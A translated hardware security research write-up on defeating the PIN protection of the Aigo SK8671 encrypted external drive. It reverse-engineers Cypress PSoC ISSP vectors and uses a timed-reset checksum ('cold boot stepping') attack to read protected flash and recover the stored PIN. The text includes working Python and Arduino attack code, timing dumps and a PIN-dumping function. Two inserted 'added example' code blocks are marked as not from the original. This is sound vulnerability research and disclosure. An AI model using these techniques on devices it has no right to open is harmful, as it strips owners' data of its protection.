Reverse-engineering the Aigo self-encrypting external HDD. Part 2: dumping the Cypress PSoC

This is the second and final part of the story about hacking an external self-encrypting drive. Let me remind you that a colleague recently brought me a Patriot (Aigo) SK8671 hard drive, I decided to reverse-engineer it, and now I am sharing the results. Before reading further, make sure you have read the first part of the article.

4. We start dumping the PSoC internal flash
5. The ISSP protocol
- 5.1. What is ISSP
- 5.2. Demystifying vectors
- 5.3. Communicating with the PSoC
- 5.4. Discovering registers and opcodes
- 5.5. Protection memory
6. First attack (failed): ROMX
7. Second attack: cold boot stepping
- 7.1. Implementation
- 7.2. Reading the results
- 7.3. Reconstructing the flash binary
- 7.4. Finding the PIN storage address
- 7.5. Dumping block 126
- 7.6. PIN recovery
8. What next?
9. Conclusion



4. We start dumping the PSoC internal flash

So, everything points (as we established in [the first part]()) to the PIN being stored in the depths of the PSoC. Therefore we need to read those depths. The tasks ahead:

  • establish "communication" with the microcontroller;
  • find a way to check whether this "communication" is protected from reading from the outside;
  • find a way to bypass the protection.

There are two places where it makes sense to look for the correct PIN:

  • the internal flash memory;
  • the SRAM, where the PIN may be stored in order to compare it with the PIN entered by the user.

Looking ahead, I will note that I did manage to dump the PSoC's internal flash, bypassing its protection mechanism with a hardware attack called "cold boot stepping", after reverse-engineering the undocumented ISSP protocol. This allowed me to dump the PIN directly.

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

The final program code:

5. The ISSP protocol

5.1. What is ISSP

"Talking" to a microcontroller can mean different things: it varies "from vendor to vendor", up to interaction over a serial protocol (for example, ICSP for Microchip's PIC).

Cypress has its own protocol for this, called ISSP (In-System Serial Programming protocol), which is described in its technical specification. Patent US7185162 also gives some information. There is also an open-source equivalent called HSSP (we will use it a little later). ISSP works as follows:

  • reset the PSoC;
  • output the magic number on the serial data pin of this PSoC to enter external programming mode;
  • send commands, which are long bit strings called "vectors".

The ISSP documentation describes these vectors for only a small handful of commands:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V options)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111, where dddddddd = block #
  • BULK-ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1, where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111, where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, where DDDDDDDDDDDDDDDD = data out: device checksum
  • ERASE-BLOCK

For example, the Initialize-2 vector:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

All vectors have the same length: 22 bits. The HSSP documentation adds some information about ISSP: "An ISSP vector is nothing more than a bit sequence that represents a set of instructions."

5.2. Demystifying vectors

Let's figure out what is going on here. At first I assumed that these vectors were some form of M8C instructions, but after checking this hypothesis I found that the operation opcodes did not match.

Then I googled the vector above and came across a study whose author, without going into details, gives some useful hints: "Each instruction begins with three bits that correspond to one of four mnemonics (read from RAM, write to RAM, read register, write register). Then come 8 address bits, followed by 8 data bits (read or write) and finally three stop bits."

Then I was able to extract some very useful information from the Supervisory ROM (SROM) section of the Technical Reference Manual. The SROM is a hard-coded ROM in the PSoC that provides useful functions (similar to syscalls) for program code running in user space:

  • 00h: SWBootReset
  • 01h: ReadBlock
  • 02h: WriteBlock
  • 03h: EraseBlock
  • 06h: TableRead
  • 07h: CheckSum
  • 08h: Calibrate0
  • 09h: Calibrate1

By matching the vector names with the SROM functions, we can map the various operations supported by the protocol onto the parameters the SROM expects. Thanks to this, we can decode the first three bits of the ISSP vectors:

  • 100 => "wrmem"
  • 101 => "rdmem"
  • 110 => "wrreg"
  • 111 => "rdreg"
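As an added example (not code from the article or from HSSP_disas.rb), the following Python decoder applies the layout described above (3 mnemonic bits, 8 address bits, 8 data bits, 3 stop bits) to the Initialize-2 vector quoted earlier and renders it in the same listing style as the disassembly later in the text. The register and RAM names are taken from that disassembly; the handling of the Z/D placeholders in read vectors is an assumption based on the READ-BYTE template.

```python
# Added example (not from the article or from HSSP_disas.rb): decode 22-bit
# ISSP vectors into the "wrreg/wrmem" listing style used later in the text.

# 3-bit operation prefix -> mnemonic, as decoded in the text
MNEMONICS = {"100": "wrmem", "101": "rdmem", "110": "wrreg", "111": "rdreg"}

# Names the article gives to the undocumented registers (wrreg/rdreg targets)
REG_NAMES = {0xF0: "A", 0xF3: "X", 0xF4: "PCl", 0xF5: "PCh", 0xF6: "SP",
             0xF7: "CPU_F", 0xF8: "opc0", 0xF9: "opc1", 0xFA: "opc2",
             0xFF: "CPU_SCR0"}

# RAM locations used as SROM call parameters (wrmem/rdmem targets)
RAM_NAMES = {0xF8: "KEY1", 0xF9: "KEY2", 0xFA: "BLOCKID", 0xFB: "POINTER"}


def decode_vector(bits):
    """Split one 22-character vector into (mnemonic, address, data).

    Layout: 3 op bits, 8 address bits, 8 data bits, 3 stop bits.  Read
    vectors (rdmem/rdreg) carry 'Z' (bus turnaround) and 'D' (data out)
    placeholders after the address instead of a value, so their data is
    returned as None (assumption based on the READ-BYTE template).
    """
    if len(bits) != 22:
        raise ValueError("ISSP vectors are exactly 22 bits long")
    op = MNEMONICS[bits[0:3]]
    addr = int(bits[3:11], 2)
    field = bits[11:19] if op.startswith("wr") else bits[12:20]
    data = int(field, 2) if set(field) <= {"0", "1"} else None
    return op, addr, data


def vector_bytes(bits):
    """Pack the 22 bits left-aligned into three bytes, as in "[DE E0 1C]"."""
    padded = bits.replace("Z", "0").replace("D", "0") + "00"
    return bytes(int(padded[i:i + 8], 2) for i in range(0, 24, 8))


def disassemble(bits):
    """Render one vector as one listing line, e.g. 'wrreg CPU_F (f7), 0x00'."""
    op, addr, data = decode_vector(bits)
    hexbytes = " ".join("%02X" % b for b in vector_bytes(bits))
    if op.endswith("reg"):
        target = "%s (%02x)" % (REG_NAMES.get(addr, "reg"), addr)
    else:
        target = RAM_NAMES.get(addr, "0x%02X" % addr)
    value = "" if data is None else ", 0x%02X" % data
    return "[%s] %s %s%s" % (hexbytes, op, target, value)


# The Initialize-2 vector from the ISSP documentation, as quoted above
INIT2 = """1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111""".split()


def disassemble_all(vectors=INIT2):
    """Decode a whole vector sequence, one listing line per vector."""
    return [disassemble(v) for v in vectors]


if __name__ == "__main__":
    print("\n".join(disassemble_all()))
```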

However, a full understanding of the on-chip processes can only be obtained by actually communicating with the PSoC.

5.3. Communicating with the PSoC

Since Dirk Petrautzki had already ported Cypress's HSSP code to Arduino, I used an Arduino Uno to connect to the ISSP connector of the keyboard board.

Note that in the course of my research I changed Dirk's code quite a bit. You can find my modification on GitHub: here is the corresponding Python script for interacting with the Arduino, and here is my cypress_psoc_tools repository.

So, using the Arduino, I at first used only the "official" vectors for "communication". I tried to read the internal ROM using the VERIFY command. As expected, I could not. Probably because of the read-protection bits set in the flash memory.

Then I created a few simple vectors of my own for writing and reading memory/registers. Note that we can read the entire SROM even though the flash memory is protected!

5.4. Discovering registers and opcodes

Looking at the "disassembled" vectors, I found that the device uses undocumented registers (0xF8-0xFA) to specify an M8C opcode that is executed directly, bypassing the protection. This allowed me to execute various opcodes such as "ADD", "MOV A,X", "PUSH" or "JMP". Thanks to them (by observing the side effects they have on the registers) I was able to determine which of the undocumented registers are in fact the real registers (A, X, SP and PC).

As a result, the "disassembled" code produced by the HSSP_disas.rb tool looks like this (I added comments for clarity):

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00   # reset flags
[DE C0 1C] wrreg SP (f6), 0x00      # reset SP
[9F 07 5C] wrmem KEY1, 0x3A     # mandatory argument for SSC
[9F 20 7C] wrmem KEY2, 0x03     # same here
[DE A0 1C] wrreg PCh (f5), 0x00     # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03     # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80      # RAM pointer for the output data
[DF 26 1C] wrreg opc1 (f9), 0x30        # opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40        # opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01  # BLOCK ID for the SSC call
[DE 00 DC] wrreg A (f0), 0x06       # "syscall" number: TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00        # opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # undocumented operation: execute external opcode

5.5. Protection memory

At this point I could talk to the PSoC, but I had no reliable information about the protection bits of the flash memory. I was very surprised that Cypress gives the device user no way to check whether protection is enabled. I dug deeper into Google to find out that the HSSP code provided by Cypress had been updated after Dirk released his modification. And there it was! This new vector had appeared:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # unknown arguments
[9F E0 1C] wrmem 0xFF, 0x00 # same here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # undocumented syscall!
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Using this vector (see read_security_data in psoc.py), we get all the security bits into SRAM at 0x80, with two bits per protected block.

The result is disheartening: everything is protected in "disable external read and write" mode. So not only can we not read anything from the flash memory, we cannot write anything to it either (for example, to install a ROM dumper there). And the only way to disable the protection is to completely erase the entire chip. 🙁

6. First attack (failed): ROMX

However, we can try the following trick: since we have the ability to execute arbitrary opcodes, why not execute ROMX, which is used to read flash memory? This approach has a reasonable chance of success, because the ReadBlock function that reads data from the SROM (which the vectors use) checks whether it was called from ISSP. The ROMX opcode, however, may not have such a check. So here is the Python code (after adding a few helper classes to the Arduino code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)         # A = high byte of the ROM address
    write_reg(0xF3, i&0xFF)       # X = low byte of the ROM address
    exec_opcodes("\x28\x30\x40")  # ROMX, HALT, NOP
    byte = read_reg(0xF0)         # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])   # print the ROM byte

Unfortunately, this code does not work. 🙁 Or rather, it works, but in the output we get our own opcodes (0x28 0x30 0x40)! I don't think this device behaviour is read protection. It looks more like an engineering trick: when executing external opcodes, the ROM bus is redirected to a temporary buffer.

7. Second attack: cold boot stepping

Since the ROMX trick didn't work, I started thinking about another variant of this trick, described in the paper "Shedding too much Light on a Microcontroller's Firmware Protection".

7.1. Implementation

The ISSP documentation gives the following vector for CHECKSUM-SETUP:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This calls SROM function 0x07, as the documentation indicates (italics mine):

This function computes a checksum. It calculates a 16-bit checksum over a user-specified number of blocks within a single flash bank, starting at zero. The BLOCKID parameter is used to pass the number of blocks to use when computing the checksum. A value of "1" computes the checksum of block zero only, while "0" causes the total checksum of all 256 blocks of the flash bank to be computed. The 16-bit checksum is returned via KEY1 and KEY2. The KEY1 parameter holds the lower 8 bits of the checksum, and the KEY2 parameter holds the upper 8 bits. For devices with multiple flash banks, the checksum function is called for each bank separately. The bank number it operates on is set via the FLS_PR1 register (by setting the bit in it that corresponds to the target flash bank).

Note that this is a simple checksum: the bytes are added up one by one; there is no fancy CRC. Moreover, knowing that the M8C core has a very small register set, I assumed that while computing the checksum the intermediate values would be stored in the same variables that eventually go to the output: KEY1 (0xF8) / KEY2 (0xF9).

So my theoretical attack looks like this:

  1. We connect via ISSP.
  2. We start the checksum computation with the CHECKSUM-SETUP vector.
  3. We reset the processor after a specified time T.
  4. We read the RAM to get the current checksum C.
  5. Repeat steps 3 and 4, increasing T a little each time.
  6. We recover the data from the flash memory by subtracting the previous checksum C from the current one.

However, there is a problem: the Initialize-1 vector that we have to send after a reset overwrites KEY1 and KEY2:

1100101000000000000000  # magic that puts the PSoC into programming mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # the checksum is overwritten here
[9F 20 7C] wrmem KEY2, 0x03 # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09   # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This code overwrites our precious checksum by calling Calibrate1 (SROM function 9)... But maybe we can simply send the magic number (from the beginning of the code above) to enter programming mode, and then read the SRAM? And yes, it works! The Arduino code that carries out this attack is quite simple:

case Cmnd_STK_START_CSUM:
    // delay in microseconds, sent by the host as a 32-bit big-endian value
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    // delayMicroseconds() is only accurate up to 16383 us, so split long
    // delays into a millisecond part and a remainder below 1000 us
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();                  // start the SROM CheckSum computation
    if(checksum_delay)                  // delayMicroseconds(0) misbehaves, skip it
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();                      // reset the PSoC into programming mode

  1. Read checksum_delay.
  2. Start the checksum computation (send_checksum_v).
  3. Wait for the specified time, keeping in mind the following pitfalls:
    • I lost a lot of time until I figured out that delayMicroseconds works correctly only for delays not exceeding 16383 µs;
    • and then wasted as much time again until I discovered that delayMicroseconds, when passed 0 as input, works incorrectly!
  4. Reset the PSoC into programming mode (we send the magic number, without sending the initialization vectors).

The final code in Python:

for delay in range(0, 150000):  # delay in microseconds
    for i in range(0, 10):      # number of reads for each delay
        try:
            reset_psoc(quiet=True)  # reset and enter programming mode
            send_vectors()      # send the initialization vectors
            ser.write("\x85"+struct.pack(">I", delay)) # compute checksum + reset after the delay
            res = ser.read(1)       # read the Arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # reopen the serial port
            continue
        print "%05d %02X %02X %02X" % (delay,      # read the RAM bytes
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

In short, this code:

  1. Reboots the PSoC (and sends it the magic number).
  2. Sends the full set of initialization vectors.
  3. Calls the Arduino function Cmnd_STK_START_CSUM (0x85), passing the delay in microseconds as a parameter.
  4. Reads the checksum (0xF8 and 0xF9) and the undocumented register 0xF1.

This code is run 10 times for each 1 µs step. 0xF1 is included here because it is the only register that changes while the checksum is being computed. It is probably some kind of temporary variable used by the arithmetic unit. Note the ugly hack I use to reset the Arduino with picocom whenever the Arduino stops showing signs of life (no idea why that happens).

7.2. Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 - the unknown register mentioned above
                  # F8 low byte of the checksum
                  # F9 high byte of the checksum

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # the checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1st byte: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00   # 2nd byte: 0xE7-0x80 = 0x67
00057 CC E7 00
00057 01 17 01  # no idea what is happening here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 again?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmmmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Ah, got it! That is the carry into the high byte
00063 01 17 01
[...]
00075 CC 17 01  # So, 0x117-0xE7 = 0x30

That said, we have a problem: since we are working with an actual checksum, a null byte does not change the current value. However, since the whole computation (8192 bytes) takes 0.1478 seconds (with small variations on each run), which comes to 18.04 µs per byte, we can use this timing to check the checksum value at the right moment. For the first runs, everything was read quite easily, because the timing of the arithmetic process is almost always the same. However, the end of this dump is less accurate because the "minor timing deviations" on each run add up and become more noticeable:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

That is 10 dumps for each microsecond of delay. The total running time to dump all 8192 bytes of flash memory is about 48 hours.

7.3. Reconstructing the flash binary

I have not yet finished writing the code that would fully reconstruct the program code of the flash memory, taking all the timing variations into account. However, I have recovered the beginning of this code. To make sure I did it correctly, I disassembled it with m8cdis:

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

It looks quite plausible!

7.4. Finding the PIN storage address

Now that we can read the checksum at the moment we want, we can check how and where it changes when we:

  • enter a wrong PIN;
  • change the PIN.

First, to find the approximate storage address, I took a checksum dump in 10 ms steps after a reset. Then I entered a wrong PIN and did the same.

The result was not very pleasant, since there were many changes. But in the end I was able to determine that the checksum changed somewhere between 120000 µs and 140000 µs of delay. But the "pincode" I got turned out to be wrong: because of the delayMicroseconds artefact, which does strange things when passed 0.

Then, after spending almost 3 hours, I remembered that the SROM CheckSum syscall takes an argument that specifies the number of blocks to checksum! So we can easily determine the storage address of the PIN and of the "wrong attempts" counter, with an accuracy of one 64-byte block.

My first runs gave the following result:

[image: checksum dump, first runs]

I changed the PIN from "123456" to "1234567" and got:

[image: checksum dump after changing the PIN]

So the PIN and the wrong-attempt counter appear to be stored in block 126.

7.5. Dumping block 126

Block #126 should be located somewhere around 125x64x18 = 144000 µs from the start of the checksum computation, and my dump looks quite plausible. Then, after manually removing several bad dumps (caused by the accumulation of "minor timing deviations"), I ended up with the following bytes (at a delay of 145527 µs):

[image: bytes of block 126 at a delay of 145527 µs]

Obviously, the PIN is stored unencrypted! Of course, these values are not ASCII codes, but as it turns out they are the readings obtained from the capacitive keyboard.

Finally, I ran a few more tests to find where the bad-attempt counter is stored. Here is the result:

[image: bad-attempt counter in block 126]

0xFF means "15 attempts", and it decrements on each failed attempt.

7.6. PIN recovery

Here is the ugly code that puts everything above together:

def dump_pin():
  # keypad scan codes -> digits (values observed in block 126)
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
  for delay in range(145495, 145719, 16):   # one sample per byte of block 126
    csum = csum_at(delay, 1)                # checksum sampled after `delay` us
    byte = (csum-last_csum)&0xFF            # byte added since the previous sample
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:             # keep only bytes that are digit scan codes
      print pin_map[pin_bytes[i]],
  print

Here is the result of running it:

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

Hooray! It works!

Note that the latency values I used are probably only valid for the specific PSoC, the one I had.
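As an added example (not the author's code), here is a Python model of the attack from sections 7.1 and 7.6: checksum_at() stands in for the SROM CheckSum call interrupted by a reset after a given delay, and recover_bytes() is the differencing step that dump_pin() performs, run both on a constructed flash image and on the checksum snapshots from the run above. The 18.04 µs per byte and the scan-code map are the article's values; the flash contents and their layout are made up.

```python
# Added example (not from the article): model of the cold-boot-stepping
# recovery. The per-byte time and the scan codes come from the article;
# the flash image is constructed here.

US_PER_BYTE = 18.04   # article's measurement: 0.1478 s for 8192 bytes

# Keypad scan codes for the digits, as read out of block 126 in the article
PIN_MAP = {0x24: "0", 0x25: "1", 0x26: "2", 0x27: "3", 0x20: "4",
           0x21: "5", 0x22: "6", 0x23: "7", 0x2C: "8", 0x2D: "9"}

# Checksum snapshots printed by the article's dump_pin() run (one per 16 us)
ARTICLE_SAMPLES = [0x53E2, 0x5407, 0x542D, 0x5454, 0x5474, 0x5495, 0x54B7,
                   0x54DA, 0x5506, 0x5506, 0x5533, 0x554C, 0x554E, 0x554E]

BLOCK = 126                       # block where the article located the PIN
PIN_CODES = [0x25, 0x26, 0x27, 0x20, 0x21, 0x22, 0x23, 0x2C, 0x00, 0x2D]


def build_flash():
    """Constructed 8 KiB image: pseudo-random filler, the PIN scan codes and
    the attempt counter (0xFF = 15 tries left) at the start of BLOCK."""
    flash = bytearray((i * 37 + 11) & 0xFF for i in range(8192))
    base = BLOCK * 64
    flash[base:base + len(PIN_CODES)] = bytes(PIN_CODES)
    flash[base + len(PIN_CODES)] = 0xFF
    return bytes(flash)


def checksum_at(flash, delay_us):
    """Model of SROM CheckSum (BLOCKID=0) interrupted by a reset after
    delay_us: the 16-bit sum of the bytes processed so far, as left in
    KEY1/KEY2."""
    done = min(len(flash), int(delay_us // US_PER_BYTE))
    return sum(flash[:done]) & 0xFFFF


def recover_bytes(samples, baseline=0):
    """Difference consecutive snapshots taken one byte apart. A zero
    difference is a genuine 0x00 byte (the sum did not move); masking to
    8 bits absorbs the carry into the high byte (0x00E7 -> 0x0117 is 0x30)."""
    out, last = [], baseline
    for csum in samples:
        out.append((csum - last) & 0xFF)
        last = csum
    return out


def pin_from_bytes(data):
    """Keep only the bytes that are digit scan codes, as dump_pin() does."""
    return "".join(PIN_MAP[b] for b in data if b in PIN_MAP)


def simulate(flash, first, count):
    """Sample the checksum in the middle of each byte's time window for
    bytes first .. first+count-1 and recover them; returns (bytes, pin)."""
    baseline = checksum_at(flash, (first + 0.5) * US_PER_BYTE)
    samples = [checksum_at(flash, (first + k + 1.5) * US_PER_BYTE)
               for k in range(count)]
    data = recover_bytes(samples, baseline)
    return data, pin_from_bytes(data)


if __name__ == "__main__":
    data, pin = simulate(build_flash(), BLOCK * 64, len(PIN_CODES) + 1)
    print(" ".join("%02x" % b for b in data), "=> PIN", pin)
    print("article samples => PIN", pin_from_bytes(recover_bytes(ARTICLE_SAMPLES)))
```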

8. What next?

So, let's sum up the PSoC side of our Aigo drive:

  • we can read the SRAM even if it is protected;
  • we can bypass the read protection with the cold boot stepping attack and read the PIN directly.

However, our attack has some flaws due to synchronization problems. It could be improved as follows:

  • write a tool to decode the output data obtained by the "cold boot stepping" attack;
  • use an FPGA device to generate more precise delays (or use the Arduino hardware timers);
  • try another attack: enter a wrong PIN, reset and dump the RAM, hoping that the correct PIN is stored in RAM for comparison. However, this is not so easy to do with an Arduino, since the Arduino signal levels are 5 volts, while the board we are examining runs at 3.3 volt levels.

One interesting thing to try is playing with voltage levels to bypass the read protection. If this approach worked, we could obtain the exact data from the flash memory instead of relying on reading the checksum with imprecise timing.

Since the SROM probably reads the protection bits in the ReadBlock syscall, we could do the same as described in Dmitry Nedospasov's blog: an implementation of the attack by Chris Gerlinsky presented at the "REcon Brussels 2017" conference.

Another interesting thing to try would be decapping the chip: to dump the SRAM, find undocumented syscalls and vulnerabilities.

9. Conclusion

So, the security of this drive leaves a lot to be desired, since it uses an ordinary (not "hardened") microcontroller to store the PIN... Plus, I have not (yet) looked at how things stand with data encryption on this device!

What could be recommended to Aigo? After analysing a couple of encrypted HDD models, in 2015 I gave a presentation at SyScan in which I analysed the security problems of several external HDDs and gave recommendations on what could be improved in them. 🙂

I spent two weekends and several evenings on this research. About 40 hours in total. Counting from the very beginning (when I opened the disk) to the very end (dumping the PIN). Those same 40 hours include the time I spent writing this article. It was a very exciting journey.

Source: www.habr.com
